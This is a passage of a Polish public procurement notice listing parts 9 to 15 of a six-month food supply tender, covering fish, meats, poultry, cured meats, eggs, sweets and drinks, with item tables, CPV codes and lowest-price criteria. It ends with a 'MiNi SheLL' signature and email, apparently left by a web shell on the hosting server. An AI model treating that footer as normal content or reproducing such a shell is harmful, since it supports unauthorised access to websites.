6	Kalafior	2000-2500g	kg	70				
7	Mieszanka kompotowa (wiśnia, aronia, czarna porzecza, śliwka, truskawka)	450g	kg	10				
8	Mieszanka kompotowa (wiśnia, aronia, czarna porzecza, śliwka, truskawka)	2000-2500g	kg	470				
9	Szpinak	450g	kg	5				
10	Szpinak	2000-2500g	kg	130				
11	Truskawki	450g	kg	5				
12	Truskawki	2000-2500g	kg	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.31.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> DOSTAWA RYB MROŻONYCH, WĘDZONYCH I PRZETWORÓW RYBNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto**
a	B	c	d	e	f	g	h	i
1	Filet z zielonego śledzia	 	kg	80				
2	Filet z tilapii b/skóry, zawartość glazury do 20%	 	kg	45				
3	Filet z morszczuka, b/skóry, płaty SHP		kg	15				
4	Filet z dorsza , b/skóry, płaty SHP	 	kg	30				
5	Filet z pangi trymowanej, płaty SHP	 	kg	200				
6	Filet z matiasa b/skóry solony (masa netto bez zalewy)	1000-4000	kg	80				
7	Filet z matiasa b/skóry solony (masa netto bez zalewy)	100-900g	kg	10				
8	Filety śledziowe w oleju z różnymi dodatkami (masa netto bez zalewy)	1000-4000g	kg	20				
9	Filety śledziowe w oleju z różnymi dodatkami (masa netto bez zalewy)	100-900g	kg	2				
10	Sałatka z filetów śledziowych
w majonezie 	1000-4000g	kg	30				
11	Sałatka z filetów śledziowych 
w majonezie 	100-900g	kg	2				
12	Sałatka -krajanka z filetów śledziowych w oleju z różnymi dodatkami (masa netto bez zalewy)	1000-4000g	kg	30				
13	Sałatka - krajanka z filetów śledziowych w oleju z różnymi dodatkami (masa netto bez zalewy)	100-900g	kg	5				
14	Koreczki śledziowe z różnymi dodatkami(masa netto bez zalewy)	1000-4000	kg	15				
15	Koreczki śledziowe z różnymi dodatkami (masa netto bez zalewy)	100-900g	kg	3				
15	Klopsy rybne opiekane w zalewie (masa netto bez zalewy)	1000-4000g	kg	18				
17	Klopsy rybne opiekane w zalewie (masa netto bez zalewy)	100-900g	kg	6				
18	Pasty rybne(z makreli, tuńczyka, łososia itp.) 	1000-4000g	kg	20				
19	Pasty rybne(z makreli, tuńczyka, łososia itp.) 	50-500g	kg	8				
20	Płaty śledziowe marynowane (masa netto bez zalewy)	1000-4000g	kg	40				
21	Płaty śledziowe marynowane (masa netto bez zalewy)	100-900g	kg	2				
22	Makrela wędzona ,tusza		kg	180				
23	Szproty wędzone		kg	12				
24	Paprykarz#	100-400g	kg	52				
25	Szproty w oleju 	150-200g	kg	40				
26	Tuńczyk w oleju - kawałki	150-200g	kg	25				
27	Śledzie w oleju  o zaw.min.60% mięsa rybnego 	150-200g	kg	10				
28	Śledzie w pomidorach o zaw. min. 60% mięsa rybnego.	150-200g	kg	13				
29	Ryba w galarecie	150-200g	kg	13.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.22.00.00-6, 15.23.40.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> DOSTAWA MIĘSA WIEPRZOWEGO I WOŁOWEGO ORAZ PODROBÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Jm	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość 
netto	Stawka Vat	Wartość 
brutto**
a	b	c	d	e	f	g	h
1	Boczek wieprzowy bez kości -świeży	kg	5				
2	Flaki wołowe parzone, cięte 	kg	40				
3	Karczek wieprzowy bez kości - świeży	kg	15				
4	Łopatka wieprzowa bez kości - świeża	kg	700				
5	Mięso mielone wieprzowo-wołowe - świeże	kg	15				
6	Nóżki wieprzowe - świeże	kg	40				
7	Ozory wieprzowe - świeże	kg	65				
8	Płuca wieprzowe - świeże	kg	40				
9	Schab wieprzowy bez kości - świeży	kg	200				
10	Słonina mielona - świeża	kg	30				
11	Wołowe ekstra bez kości - świeże	kg	35				
12	Wołowe z kością, antrykot - świeże	kg	130				
13	Żeberka wieprzowe, paski - świeże	kg	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> DOSTAWA MIĘSA I PODROBÓW DROBIOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp	Nazwa artykułu	Sugerowana waga jednostkowa	Jm.	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto**
a	b	c	d	e	f	g	h	i
1	Kurczaki świeże	1300 -1700g	kg	100				

2	Porcje rosołowe mrożone -paczkowane	500g -2000g	kg	300				
3	Serca z indyka świeże 		kg	30				
4	Udka z kurczaka, ćwiartki - świeże	350-400g	kg	40				
5	Wątróbka z kurczaka -świeża 		kg	70				
6	Żołądki z indyka - świeże 		kg	50				
7	Filety z kurczaka - świeże		kg	110				
8	Filety z indyka - świeże		kg	20				
9	Podudzie z kurczaka - świeże	150g-180g	kg	270				
10	Filet z udźca z kurczaka, bez skóry - świeży	100-160g	kg	120				
11	Filet z udźca z kurczaka, ze skórą - świeży	120 - 180g	kg	150				
12	Udziec z kurczaka z kością - świeży	150-180g	kg	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.23.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> DOSTAWA WĘDLIN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp	Nazwa artykułu	Nazwa własna#	

Jm	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto**
a	b	c	d	e	f	g	h	i
1	Baleron wieprzowy gotowany (zawartość mięsa wieprzowego min. 80% )		kg	60				
2	Blok drobiowy grubo rozdrobniony (zawartość mięsa drobiowego min. 70% )		kg	80				
3	Blok wieprzowy grubo rozdrobniony (zawartość mięsa wieprzowego min. 70%)		kg	100				
4	Boczek rolowany faszerowany (zawartość mięsa min. 70%)		kg	65				
5	Boczek wędzony surowy, paski bez kości, 		kg	160				
6	Filet  z indyka wędzony, pieczony-płat (mięso z indyka nierozdrobnione min.95%)		kg	45				
7	Kiełbasa wieprzowa biała  parzona średnio rozdrobniona (zawartość mięsa min.75%)		kg	80				
8	Kiełbasa wieprzowa podsuszana grubo rozdrobniona - kanapkowa, np. żywiecka, krakowska, oławska itp.(zawartość mięsa min.80%)		kg	90				
9	Kiełbasa wieprzowa parówkowa drobno rozdrobniona (zawartość mięsa min.70%)		kg	220				
10	Kiełbasa wieprzowa surowa wędzona średnio rozdrobniona (zawartość mięsa min.80% )		kg	30				
11	Kiełbasa wieprzowa swojska wędzona, pieczona -cienka, średnio rozdrobniona    (zawartość mięsa min.80% )		kg	130				
12
	Kiełbasa wieprzowa parzona                  grubo rozdrobniona - kanapkowa, np. krakowska, kminkowa, dębicka itp.(zawartość mięsa min.80%)		kg	110				
13	Kiełbasa wieprzowa szynkowa grubo rozdrobniona (zawartość mięsa min.80%)		kg	80				
14	Kiełbasa śląska drobiowa średnio rozdrobniona (zawartość mięsa min.70%)		kg	110				
15	Kiełbasa śląska wieprzowa średnio rozdrobniona (zawartość mięsa min.70%)		kg	100				
16	Kiełbasa toruńska średnio rozdrobniona (zawartość mięsa min.70%)		kg	80				
17	Kiełbasa wieprzowa głogowska średnio rozdrobniona (zawartość mięsa min.80%)		kg	50				
18	Kiełbasa zwyczajna średnio rozdrobniona (zawartość mięsa min.60%)		kg	115				
19	Kiełbaski wieprzowe z serem średnio rozdrobnione, cienkie ( zawartość mięsa min.70% )		kg	15				
20	
Krupnioki śląskie		kg	60				
21	Bułczanka		kg	40				
22	Metka wieprzowa podwędzana                        grubo rozdrobniona		kg	70				
23	Metka smakowa  średnio rozdrobniona, np. cebulowa, tatarska, łososiowa itp.		kg	50				
24	Mielonka drobiowa średnio rozdrobniona (zawartość mięsa min. 70%)		kg	35				
25	Mielonka wieprzowa średnio rozdrobniona (zawartość mięsa min. 70%)		kg	60				
26	Mortadela wieprzowa drobno rozdrobniona (zawartość mięsa min. 70%)		kg	100				
27	Ogonówka parzona  (zawartość mięsa min. 80%)		kg	120				
28	Parówki  drobiowe drobno rozdrobnione (zawartość mięsa min. 70%)		kg	300				
29	Parówki wieprzowe śląskie średnio rozdrobnione (zawartość mięsa min. 70%)
		kg	200				
30	Pasztetowa drobiowa		kg	20				
31	Pasztetowa wieprzowa popularna		kg	45				
32	Pasztetowa wieprzowa podwędzana		kg	45				
33	Polędwica sopocka (zawartość mięsa min.80%)		kg	70				
34	Polędwica z indyka średnio rozdrobniona (zawartość mięsa min.70%)		kg	45				
35	Rolada drobiowa faszerowana (zawartość mięsa min. 70%)		kg	100				
36	Salami wieprzowe, szlachetne drobno rozdrobnione (zawartość mięsa min. 80%)		kg	10				
37	Salceson drobiowy grubo rozdrobniony (zawartość mięsa min. 40%)		kg	60				
38	Salceson ozorkowy grubo rozdrobniony (zawartość podrobów wieprzowych min. 51%, w tym ozory 35% )		kg	60				
39	Szynka drobiowa z kurczaka grubo rozdrobniona (zawartość mięsa min.70% )		kg	70				
40	Szynka wieprzowa gotowana (zawartość mięsa min. 80%)		kg	50				
41	Szynka wieprzowa parzona konserwowa (zawartość mięsa min. 75%)		kg	70				
42	Indyk w galarecie (zawartość mięsa min. 50%)		kg	60				
43	Szynka wieprzowa tradycyjna, np.wiejska, swojska, itp. (zawartość mięsa min. 85%)		kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> DOSTAWA JAJ KURZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


Lp.	Nazwa artykułu	Sugerowana
waga jajka	Jm	Orientacyjna ilość
Zamówienia*	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto**
a	b	c	d	e	f	g	h	i
1	Jaja kurze 	63g-73g (L)	szt	14 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> DOSTAWA CZEKOLAD I WYROBÓW CUKIERNICZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


Lp.	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna
Ilość zamówienia*
	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto**
a	b	c	d	e	f	g	h	i
1	Biszkopty	100-500g	kg	10				
2	Biszkopty 	1000-3000g	kg	35				
3	Bombonierka - czekoladki nadziewane 	100-200g	kg	7				
4	Cukierki czekoladowe (nadzienie kakaowe, orzechowe, rumowe, np. michałki, itp.)		kg	10				
5	Ciastka maślane 	800-2500g	kg	15				
6	Ciastka deserowe (kakaowe, z cukrem, z kokosem itp.)	800-2500g	kg	20				
7	Ciastka deserowe oblewane czekoladą	800-2500g	kg	10				
8	Ciasteczka deserowe 
z nadzieniem owocowym, kremowym	800-2500g	kg	10				
9	Pierniki nadziewane
w czekoladzie	800-2500g	kg	8				
10	Biszkopty z galaretką 
w czekoladzie	800-1000g	kg	12				
11	Galaretka w czekoladzie		kg	8				
12	Praliny nadziewane 
(min. 40% masy kakaowej)		kg	5				
13	Czekolada mleczna 
(min.30% masy kakaowej)	100g	szt.	35				
14	Ciastka bez dodatku cukru 	70g-150g	kg	7				
15	Wafelki bez dodatku cukru	70-150g	kg	2				
16	Zestaw świąteczny w czekoladzie mlecznej	80-120g	kg 18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> DOSTAWA NAPOJÓW BEZALKOHOLOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia*	Cena jedn. netto	Wartość netto	Stawka Vat	Wartość brutto**
a	b	c	d	e	f	g	h	i
1	Napoje owocowe pasteryzowane
niegazowane 
( min. 25% soku )	1000 -2000ml	l	250				
2	Soczki owocowo-warzywne 100% przecierowe, 	250-330ml	l	120				
3	Soki owocowo - warzywne 100% przecierowe, 	750-1000ml	l	180				
4	Syrop wysokosłodzony	330-500ml	l	25				
5	Woda mineralna gazowowana/niegazowana	1500 ml	szt	12				
6	Soki owocowe 100%	1000ml	l	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com